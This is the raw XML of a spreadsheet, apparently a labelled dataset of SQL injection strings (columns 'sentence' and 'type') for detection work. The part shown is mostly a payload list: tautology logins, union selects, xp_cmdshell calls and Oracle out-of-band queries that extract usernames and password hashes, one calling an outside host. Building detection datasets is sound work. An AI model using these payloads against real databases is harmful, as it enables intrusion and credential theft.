  <c r="C11948" i="1"/>
  <c r="C11947" i="1"/>
  <c r="C11946" i="1"/>
  <c r="C11945" i="1"/>
  <c r="C11944" i="1"/>
  <c r="C11943" i="1"/>
  <c r="C11942" i="1"/>
  <c r="C11941" i="1"/>
  <c r="C11940" i="1"/>
  <c r="C11939" i="1"/>
  <c r="C11938" i="1"/>
  <c r="C11937" i="1"/>
  <c r="C11936" i="1"/>
  <c r="C11935" i="1"/>
  <c r="C11934" i="1"/>
  <c r="C11933" i="1"/>
  <c r="C11932" i="1"/>
  <c r="C11931" i="1"/>
  <c r="C11930" i="1"/>
  <c r="C11929" i="1"/>
  <c r="C11928" i="1"/>
  <c r="C11927" i="1"/>
  <c r="C11926" i="1"/>
  <c r="C11925" i="1"/>
  <c r="C11924" i="1"/>
  <c r="C11923" i="1"/>
  <c r="C11922" i="1"/>
  <c r="C11921" i="1"/>
  <c r="C11920" i="1"/>
  <c r="C11919" i="1"/>
  <c r="C11918" i="1"/>
  <c r="C11917" i="1"/>
  <c r="C11916" i="1"/>
  <c r="C11915" i="1"/>
  <c r="C11914" i="1"/>
  <c r="C11913" i="1"/>
  <c r="C11912" i="1"/>
  <c r="C11911" i="1"/>
  <c r="C11910" i="1"/>
  <c r="C11909" i="1"/>
  <c r="C11908" i="1"/>
  <c r="C11907" i="1"/>
  <c r="C11906" i="1"/>
  <c r="C11905" i="1"/>
  <c r="C11904" i="1"/>
  <c r="C11903" i="1"/>
  <c r="C11902" i="1"/>
  <c r="C11901" i="1"/>
  <c r="C11900" i="1"/>
  <c r="C11899" i="1"/>
  <c r="C11898" i="1"/>
  <c r="C11897" i="1"/>
  <c r="C11896" i="1"/>
  <c r="C11895" i="1"/>
  <c r="C11894" i="1"/>
  <c r="C11893" i="1"/>
  <c r="C11892" i="1"/>
  <c r="C11891" i="1"/>
  <c r="C11890" i="1"/>
  <c r="C11889" i="1"/>
  <c r="C11888" i="1"/>
  <c r="C11887" i="1"/>
  <c r="C11886" i="1"/>
  <c r="C11885" i="1"/>
  <c r="C11884" i="1"/>
  <c r="C11883" i="1"/>
  <c r="C11882" i="1"/>
  <c r="C11881" i="1"/>
  <c r="C11880" i="1"/>
  <c r="C11879" i="1"/>
  <c r="C11878" i="1"/>
  <c r="C11877" i="1"/>
  <c r="C11876" i="1"/>
  <c r="C11875" i="1"/>
  <c r="C11874" i="1"/>
  <c r="C11873" i="1"/>
  <c r="C11872" i="1"/>
  <c r="C11871" i="1"/>
  <c r="C11870" i="1"/>
  <c r="C11869" i="1"/>
  <c r="C11868" i="1"/>
  <c r="C11867" i="1"/>
  <c r="C11866"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804" i="1"/>
  <c r="C11803" i="1"/>
  <c r="C11802" i="1"/>
  <c r="C11801" i="1"/>
  <c r="C11800" i="1"/>
  <c r="C11799" i="1"/>
  <c r="C11798" i="1"/>
  <c r="C11797" i="1"/>
  <c r="C11796" i="1"/>
  <c r="C11795" i="1"/>
  <c r="C11794" i="1"/>
  <c r="C11793" i="1"/>
  <c r="C11792" i="1"/>
  <c r="C11791" i="1"/>
  <c r="C11790" i="1"/>
  <c r="C11789" i="1"/>
  <c r="C11788" i="1"/>
  <c r="C11787" i="1"/>
  <c r="C11786" i="1"/>
  <c r="C11785" i="1"/>
  <c r="C11784" i="1"/>
  <c r="C11783" i="1"/>
  <c r="C11782" i="1"/>
  <c r="C11781" i="1"/>
  <c r="C11780" i="1"/>
  <c r="C11779" i="1"/>
  <c r="C11778" i="1"/>
  <c r="C11777" i="1"/>
  <c r="C11776" i="1"/>
  <c r="C11775" i="1"/>
  <c r="C11774" i="1"/>
  <c r="C11773" i="1"/>
  <c r="C11772" i="1"/>
  <c r="C11771" i="1"/>
  <c r="C11770" i="1"/>
  <c r="C11769" i="1"/>
  <c r="C11768" i="1"/>
  <c r="C11767" i="1"/>
  <c r="C11766" i="1"/>
  <c r="C11765" i="1"/>
  <c r="C11764" i="1"/>
  <c r="C11763" i="1"/>
  <c r="C11762" i="1"/>
  <c r="C11761" i="1"/>
  <c r="C11760" i="1"/>
  <c r="C11759" i="1"/>
  <c r="C11758" i="1"/>
  <c r="C11757" i="1"/>
  <c r="C11756" i="1"/>
  <c r="C11755" i="1"/>
  <c r="C11754" i="1"/>
  <c r="C11753" i="1"/>
  <c r="C11752" i="1"/>
  <c r="C11751" i="1"/>
  <c r="C11750" i="1"/>
  <c r="C11749" i="1"/>
  <c r="C11748" i="1"/>
  <c r="C11747" i="1"/>
  <c r="C11746" i="1"/>
  <c r="C11745" i="1"/>
  <c r="C11744" i="1"/>
  <c r="C11743" i="1"/>
  <c r="C11742" i="1"/>
  <c r="C11741" i="1"/>
  <c r="C11740" i="1"/>
  <c r="C11739" i="1"/>
  <c r="C11738" i="1"/>
  <c r="C11737" i="1"/>
  <c r="C11736" i="1"/>
  <c r="C11735" i="1"/>
  <c r="C11734" i="1"/>
  <c r="C11733" i="1"/>
  <c r="C11732" i="1"/>
  <c r="C11731" i="1"/>
  <c r="C11730" i="1"/>
  <c r="C11729" i="1"/>
  <c r="C11728" i="1"/>
  <c r="C11727" i="1"/>
  <c r="C11726" i="1"/>
  <c r="C11725" i="1"/>
  <c r="C11724" i="1"/>
  <c r="C11723" i="1"/>
  <c r="C11722" i="1"/>
  <c r="C11721" i="1"/>
  <c r="C11720" i="1"/>
  <c r="C11719" i="1"/>
  <c r="C11718" i="1"/>
  <c r="C11717" i="1"/>
  <c r="C11716" i="1"/>
  <c r="C11715" i="1"/>
  <c r="C11714" i="1"/>
  <c r="C11713" i="1"/>
  <c r="C11712" i="1"/>
  <c r="C11711" i="1"/>
  <c r="C11710" i="1"/>
  <c r="C11709" i="1"/>
  <c r="C11708" i="1"/>
  <c r="C11707" i="1"/>
  <c r="C11706" i="1"/>
  <c r="C11705" i="1"/>
  <c r="C11704" i="1"/>
  <c r="C11703" i="1"/>
  <c r="C11702" i="1"/>
  <c r="C11701" i="1"/>
  <c r="C11700" i="1"/>
  <c r="C11699" i="1"/>
  <c r="C11698" i="1"/>
  <c r="C11697" i="1"/>
  <c r="C11696" i="1"/>
  <c r="C11695" i="1"/>
  <c r="C11694" i="1"/>
  <c r="C11693" i="1"/>
  <c r="C11692" i="1"/>
  <c r="C11691" i="1"/>
  <c r="C11690" i="1"/>
  <c r="C11689" i="1"/>
  <c r="C11688" i="1"/>
  <c r="C11687" i="1"/>
  <c r="C11686" i="1"/>
  <c r="C11685" i="1"/>
  <c r="C11684" i="1"/>
  <c r="C11683" i="1"/>
  <c r="C11682" i="1"/>
  <c r="C11681" i="1"/>
  <c r="C11680" i="1"/>
  <c r="C11679" i="1"/>
  <c r="C11678" i="1"/>
  <c r="C11677" i="1"/>
  <c r="C11676" i="1"/>
  <c r="C11675" i="1"/>
  <c r="C11674" i="1"/>
  <c r="C11673" i="1"/>
  <c r="C11672" i="1"/>
  <c r="C11671" i="1"/>
  <c r="C11670" i="1"/>
  <c r="C11669" i="1"/>
  <c r="C11668" i="1"/>
  <c r="C11667" i="1"/>
  <c r="C11666" i="1"/>
  <c r="C11665" i="1"/>
  <c r="C11664" i="1"/>
  <c r="C11663" i="1"/>
  <c r="C11662" i="1"/>
  <c r="C11661" i="1"/>
  <c r="C11660" i="1"/>
  <c r="C11659" i="1"/>
  <c r="C11658" i="1"/>
  <c r="C11657" i="1"/>
  <c r="C11656" i="1"/>
  <c r="C11655" i="1"/>
  <c r="C11654" i="1"/>
  <c r="C11653" i="1"/>
  <c r="C11652" i="1"/>
  <c r="C11651" i="1"/>
  <c r="C11650" i="1"/>
  <c r="C11649" i="1"/>
  <c r="C11648" i="1"/>
  <c r="C11647" i="1"/>
  <c r="C11646" i="1"/>
  <c r="C11645" i="1"/>
  <c r="C11644" i="1"/>
  <c r="C11643" i="1"/>
  <c r="C11642" i="1"/>
  <c r="C11641" i="1"/>
  <c r="C11640" i="1"/>
  <c r="C11639" i="1"/>
  <c r="C11638" i="1"/>
  <c r="C11637" i="1"/>
  <c r="C11636" i="1"/>
  <c r="C11635" i="1"/>
  <c r="C11634" i="1"/>
  <c r="C11633" i="1"/>
  <c r="C11632" i="1"/>
  <c r="C11631" i="1"/>
  <c r="C11630" i="1"/>
  <c r="C11629" i="1"/>
  <c r="C11628" i="1"/>
  <c r="C11627" i="1"/>
  <c r="C11626" i="1"/>
  <c r="C11625" i="1"/>
  <c r="C11624" i="1"/>
  <c r="C11623" i="1"/>
  <c r="C11622" i="1"/>
  <c r="C11621" i="1"/>
  <c r="C11620" i="1"/>
  <c r="C11619" i="1"/>
  <c r="C11618" i="1"/>
  <c r="C11617" i="1"/>
  <c r="C11616" i="1"/>
  <c r="C11615" i="1"/>
  <c r="C11614" i="1"/>
  <c r="C11613" i="1"/>
  <c r="C11612" i="1"/>
  <c r="C11611" i="1"/>
  <c r="C11610" i="1"/>
  <c r="C11609" i="1"/>
  <c r="C11608" i="1"/>
  <c r="C11607" i="1"/>
  <c r="C11606" i="1"/>
  <c r="C11605" i="1"/>
  <c r="C11604" i="1"/>
  <c r="C11603" i="1"/>
  <c r="C11602" i="1"/>
  <c r="C11601" i="1"/>
  <c r="C11600" i="1"/>
  <c r="C11599" i="1"/>
  <c r="C11598" i="1"/>
  <c r="C11597" i="1"/>
  <c r="C11596" i="1"/>
  <c r="C11595" i="1"/>
  <c r="C11594" i="1"/>
  <c r="C11593" i="1"/>
  <c r="C11592" i="1"/>
  <c r="C11591" i="1"/>
  <c r="C11590" i="1"/>
  <c r="C11589" i="1"/>
  <c r="C11588" i="1"/>
  <c r="C11587" i="1"/>
  <c r="C11586" i="1"/>
  <c r="C11585" i="1"/>
  <c r="C11584" i="1"/>
  <c r="C11583" i="1"/>
  <c r="C11582" i="1"/>
  <c r="C11581" i="1"/>
  <c r="C11580" i="1"/>
  <c r="C11579" i="1"/>
  <c r="C11578" i="1"/>
  <c r="C11577" i="1"/>
  <c r="C11576" i="1"/>
  <c r="C11575" i="1"/>
  <c r="C11574" i="1"/>
  <c r="C11573" i="1"/>
  <c r="C11572" i="1"/>
  <c r="C11571" i="1"/>
  <c r="C11570" i="1"/>
  <c r="C11569" i="1"/>
  <c r="C11568" i="1"/>
  <c r="C11567" i="1"/>
  <c r="C11566" i="1"/>
  <c r="C11565" i="1"/>
  <c r="C11564" i="1"/>
  <c r="C11563" i="1"/>
  <c r="C11562" i="1"/>
  <c r="C11561" i="1"/>
  <c r="C11560" i="1"/>
  <c r="C11559" i="1"/>
  <c r="C11558" i="1"/>
  <c r="C11557" i="1"/>
  <c r="C11556" i="1"/>
  <c r="C11555" i="1"/>
  <c r="C11554" i="1"/>
  <c r="C11553" i="1"/>
  <c r="C11552" i="1"/>
  <c r="C11551" i="1"/>
  <c r="C11550" i="1"/>
  <c r="C11549" i="1"/>
  <c r="C11548" i="1"/>
  <c r="C11547" i="1"/>
  <c r="C11546" i="1"/>
  <c r="C11545" i="1"/>
  <c r="C11544" i="1"/>
  <c r="C11543" i="1"/>
  <c r="C11542" i="1"/>
  <c r="C11541" i="1"/>
  <c r="C11540" i="1"/>
  <c r="C11539" i="1"/>
  <c r="C11538" i="1"/>
  <c r="C11537" i="1"/>
  <c r="C11536" i="1"/>
  <c r="C11535" i="1"/>
  <c r="C11534" i="1"/>
  <c r="C11533" i="1"/>
  <c r="C11532" i="1"/>
  <c r="C11531" i="1"/>
  <c r="C11530" i="1"/>
  <c r="C11529" i="1"/>
  <c r="C11528" i="1"/>
  <c r="C11527" i="1"/>
  <c r="C11526" i="1"/>
  <c r="C11525" i="1"/>
  <c r="C11524" i="1"/>
  <c r="C11523" i="1"/>
  <c r="C11522" i="1"/>
  <c r="C11521" i="1"/>
  <c r="C11520" i="1"/>
  <c r="C11519" i="1"/>
  <c r="C11518" i="1"/>
  <c r="C11517" i="1"/>
  <c r="C11516" i="1"/>
  <c r="C11515" i="1"/>
  <c r="C11514" i="1"/>
  <c r="C11513" i="1"/>
  <c r="C11512" i="1"/>
  <c r="C11511" i="1"/>
  <c r="C11510" i="1"/>
  <c r="C11509" i="1"/>
  <c r="C11508" i="1"/>
  <c r="C11507" i="1"/>
  <c r="C11506" i="1"/>
  <c r="C11505" i="1"/>
  <c r="C11504" i="1"/>
  <c r="C11503" i="1"/>
  <c r="C11502" i="1"/>
  <c r="C11501" i="1"/>
  <c r="C11500" i="1"/>
  <c r="C11499" i="1"/>
  <c r="C11498" i="1"/>
  <c r="C11497" i="1"/>
  <c r="C11496" i="1"/>
  <c r="C11495" i="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459" i="1"/>
  <c r="C11458" i="1"/>
  <c r="C11457" i="1"/>
  <c r="C11456" i="1"/>
  <c r="C11455" i="1"/>
  <c r="C11454" i="1"/>
  <c r="C11453" i="1"/>
  <c r="C11452" i="1"/>
  <c r="C11451" i="1"/>
  <c r="C11450" i="1"/>
  <c r="C11449" i="1"/>
  <c r="C11448" i="1"/>
  <c r="C11447" i="1"/>
  <c r="C11446" i="1"/>
  <c r="C11445" i="1"/>
  <c r="C11444" i="1"/>
  <c r="C11443" i="1"/>
  <c r="C11442" i="1"/>
  <c r="C11441" i="1"/>
  <c r="C11440" i="1"/>
  <c r="C11439" i="1"/>
  <c r="C11438" i="1"/>
  <c r="C11437" i="1"/>
  <c r="C11436" i="1"/>
  <c r="C11435" i="1"/>
  <c r="C11434" i="1"/>
  <c r="C11433" i="1"/>
  <c r="C11432" i="1"/>
  <c r="C11431" i="1"/>
  <c r="C11430" i="1"/>
  <c r="C11429" i="1"/>
  <c r="C11428" i="1"/>
  <c r="C11427"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262" i="1"/>
  <c r="C11261" i="1"/>
  <c r="C11260" i="1"/>
  <c r="C11259" i="1"/>
  <c r="C11258" i="1"/>
  <c r="C11257" i="1"/>
  <c r="C11256" i="1"/>
  <c r="C11255" i="1"/>
  <c r="C11254" i="1"/>
  <c r="C11253" i="1"/>
  <c r="C11252" i="1"/>
  <c r="C11251"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7" i="1"/>
  <c r="C11096" i="1"/>
  <c r="C11095" i="1"/>
  <c r="C11094" i="1"/>
  <c r="C11093" i="1"/>
  <c r="C11092" i="1"/>
  <c r="C11091" i="1"/>
  <c r="C11090" i="1"/>
  <c r="C11089" i="1"/>
  <c r="C11088" i="1"/>
  <c r="C11087" i="1"/>
  <c r="C11086" i="1"/>
  <c r="C11085" i="1"/>
  <c r="C11084" i="1"/>
  <c r="C11083" i="1"/>
  <c r="C11082" i="1"/>
  <c r="C11081" i="1"/>
  <c r="C11080" i="1"/>
  <c r="C11079" i="1"/>
  <c r="C11078" i="1"/>
  <c r="C11077" i="1"/>
  <c r="C11076" i="1"/>
  <c r="C11075" i="1"/>
  <c r="C11074" i="1"/>
  <c r="C11073" i="1"/>
  <c r="C11072" i="1"/>
  <c r="C11071" i="1"/>
  <c r="C11070" i="1"/>
  <c r="C11069" i="1"/>
  <c r="C11068" i="1"/>
  <c r="C11067" i="1"/>
  <c r="C11066" i="1"/>
  <c r="C11065"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4"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4"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40"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407" i="1"/>
  <c r="C10406" i="1"/>
  <c r="C10405" i="1"/>
  <c r="C10404" i="1"/>
  <c r="C10403" i="1"/>
  <c r="C10402" i="1"/>
  <c r="C10401" i="1"/>
  <c r="C10400" i="1"/>
  <c r="C10399" i="1"/>
  <c r="C10398" i="1"/>
  <c r="C10397" i="1"/>
  <c r="C10396" i="1"/>
  <c r="C10395" i="1"/>
  <c r="C10394" i="1"/>
  <c r="C10393" i="1"/>
  <c r="C10392" i="1"/>
  <c r="C10391" i="1"/>
  <c r="C10390" i="1"/>
  <c r="C10389" i="1"/>
  <c r="C10388" i="1"/>
  <c r="C10387" i="1"/>
  <c r="C10386"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3" i="1"/>
  <c r="C10252" i="1"/>
  <c r="C10251" i="1"/>
  <c r="C10250" i="1"/>
  <c r="C10249" i="1"/>
  <c r="C10248" i="1"/>
  <c r="C10247" i="1"/>
  <c r="C10246" i="1"/>
  <c r="C10245" i="1"/>
  <c r="C10244" i="1"/>
  <c r="C10243" i="1"/>
  <c r="C10242" i="1"/>
  <c r="C10241" i="1"/>
  <c r="C10240" i="1"/>
  <c r="C10239" i="1"/>
  <c r="C10238" i="1"/>
  <c r="C10237" i="1"/>
  <c r="C10236" i="1"/>
  <c r="C10235" i="1"/>
  <c r="C10234" i="1"/>
  <c r="C10233" i="1"/>
  <c r="C10232" i="1"/>
  <c r="C10231" i="1"/>
  <c r="C10230" i="1"/>
  <c r="C10229" i="1"/>
  <c r="C10228" i="1"/>
  <c r="C10227" i="1"/>
  <c r="C10226" i="1"/>
  <c r="C10225" i="1"/>
  <c r="C10224" i="1"/>
  <c r="C10223" i="1"/>
  <c r="C10222" i="1"/>
  <c r="C10221" i="1"/>
  <c r="C10220" i="1"/>
  <c r="C10219" i="1"/>
  <c r="C10218" i="1"/>
  <c r="C10217" i="1"/>
  <c r="C10216" i="1"/>
  <c r="C10215" i="1"/>
  <c r="C10214" i="1"/>
  <c r="C10213" i="1"/>
  <c r="C10212" i="1"/>
  <c r="C10211" i="1"/>
  <c r="C10210" i="1"/>
  <c r="C10209" i="1"/>
  <c r="C10208" i="1"/>
  <c r="C10207" i="1"/>
  <c r="C10206" i="1"/>
  <c r="C10205" i="1"/>
  <c r="C10204" i="1"/>
  <c r="C10203" i="1"/>
  <c r="C10202" i="1"/>
  <c r="C10201" i="1"/>
  <c r="C10200" i="1"/>
  <c r="C10199" i="1"/>
  <c r="C10198" i="1"/>
  <c r="C10197" i="1"/>
  <c r="C10196" i="1"/>
  <c r="C10195" i="1"/>
  <c r="C10194" i="1"/>
  <c r="C10193" i="1"/>
  <c r="C10192" i="1"/>
  <c r="C10191" i="1"/>
  <c r="C10190" i="1"/>
  <c r="C10189" i="1"/>
  <c r="C10188" i="1"/>
  <c r="C10187" i="1"/>
  <c r="C10186" i="1"/>
  <c r="C10185" i="1"/>
  <c r="C10184" i="1"/>
  <c r="C10183" i="1"/>
  <c r="C10182" i="1"/>
  <c r="C10181" i="1"/>
  <c r="C10180" i="1"/>
  <c r="C10179" i="1"/>
  <c r="C10178" i="1"/>
  <c r="C10177" i="1"/>
  <c r="C10176" i="1"/>
  <c r="C10175" i="1"/>
  <c r="C10174"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="39200" uniqueCount="37540">
  <si>
    <t>sentence</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>a' --</t>
  </si>
  <si>
    <t>a' or 1 = 1; --</t>
  </si>
  <si>
    <t>@</t>
  </si>
  <si>
    <t>?</t>
  </si>
  <si>
    <t>' and 1 = 0 )  union all</t>
  </si>
  <si>
    <t>? or 1 = 1 --</t>
  </si>
  <si>
    <t>x' and userid is NULL; --</t>
  </si>
  <si>
    <t>x' and email is NULL; --</t>
  </si>
  <si>
    <t>anything' or 'x' = 'x</t>
  </si>
  <si>
    <t>x' and 1 =  ( select count ( * )  from tabname ) ; --</t>
  </si>
  <si>
    <t>x' and members.email is NULL; --</t>
  </si>
  <si>
    <t>x' or full_name like '%bob%</t>
  </si>
  <si>
    <t>23 or 1 = 1; --</t>
  </si>
  <si>
    <t>'; exec master..xp_cmdshell 'ping 172.10.1.255'--</t>
  </si>
  <si>
    <t>1 or 1 = 1</t>
  </si>
  <si>
    <t>1' or '1' = '1</t>
  </si>
  <si>
    <t>1 and user_name (  )   =  'dbo'</t>
  </si>
  <si>
    <t>1'1</t>
  </si>
  <si>
    <t xml:space="preserve">1 exec sp_  ( or exec xp_ ) </t>
  </si>
  <si>
    <t>1 and 1 = 1</t>
  </si>
  <si>
    <t>1' and 1 =  ( select count ( * )  from tablenames ) ; --</t>
  </si>
  <si>
    <t>\'; desc users; --</t>
  </si>
  <si>
    <t>1\'1</t>
  </si>
  <si>
    <t>1' and non_existant_table  =  '1</t>
  </si>
  <si>
    <t>' or username is not NULL or username  =  '</t>
  </si>
  <si>
    <t>1 and ascii ( lower ( substring  (  (  select top 1 name from sysobjects where xtype = 'u' ) , 1, 1  )  )   )  &gt; 116</t>
  </si>
  <si>
    <t>1 union all select 1,2,3,4,5,6,name from sysobjects where xtype  =  'u' --</t>
  </si>
  <si>
    <t>1 uni/**/on select all from where</t>
  </si>
  <si>
    <t>â€™ or â€˜1â€™ = â€™1</t>
  </si>
  <si>
    <t>' or '1' = '1</t>
  </si>
  <si>
    <t>'||utl_http.request ( 'httP://192.168.1.1/' ) ||'</t>
  </si>
  <si>
    <t>' || myappadmin.adduser ( 'admin', 'newpass' )  || '</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT banner FROM v$version WHERE ROWNUM = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.LOGIN_USER FROM DUAL  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.DATABASE_NAME FROM DUAL  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT host_name FROM v$instance  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT global_name FROM global_name  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( USERNAME  )  )   FROM SYS.ALL_USERS  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( PASSWORD  )  )   FROM SYS.USER$  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( table_name  )  )   FROM sys.all_tables  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( column_name  )  )   FROM sys.all_tab_columns  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( GRANTED_ROLE  )  )   FROM DBA_ROLE_PRIVS WHERE GRANTEE = SYS.LOGIN_USER  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 2  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 4  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 4  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 4  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 4  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 4  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 5  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 5  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 5  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 5  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 5  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
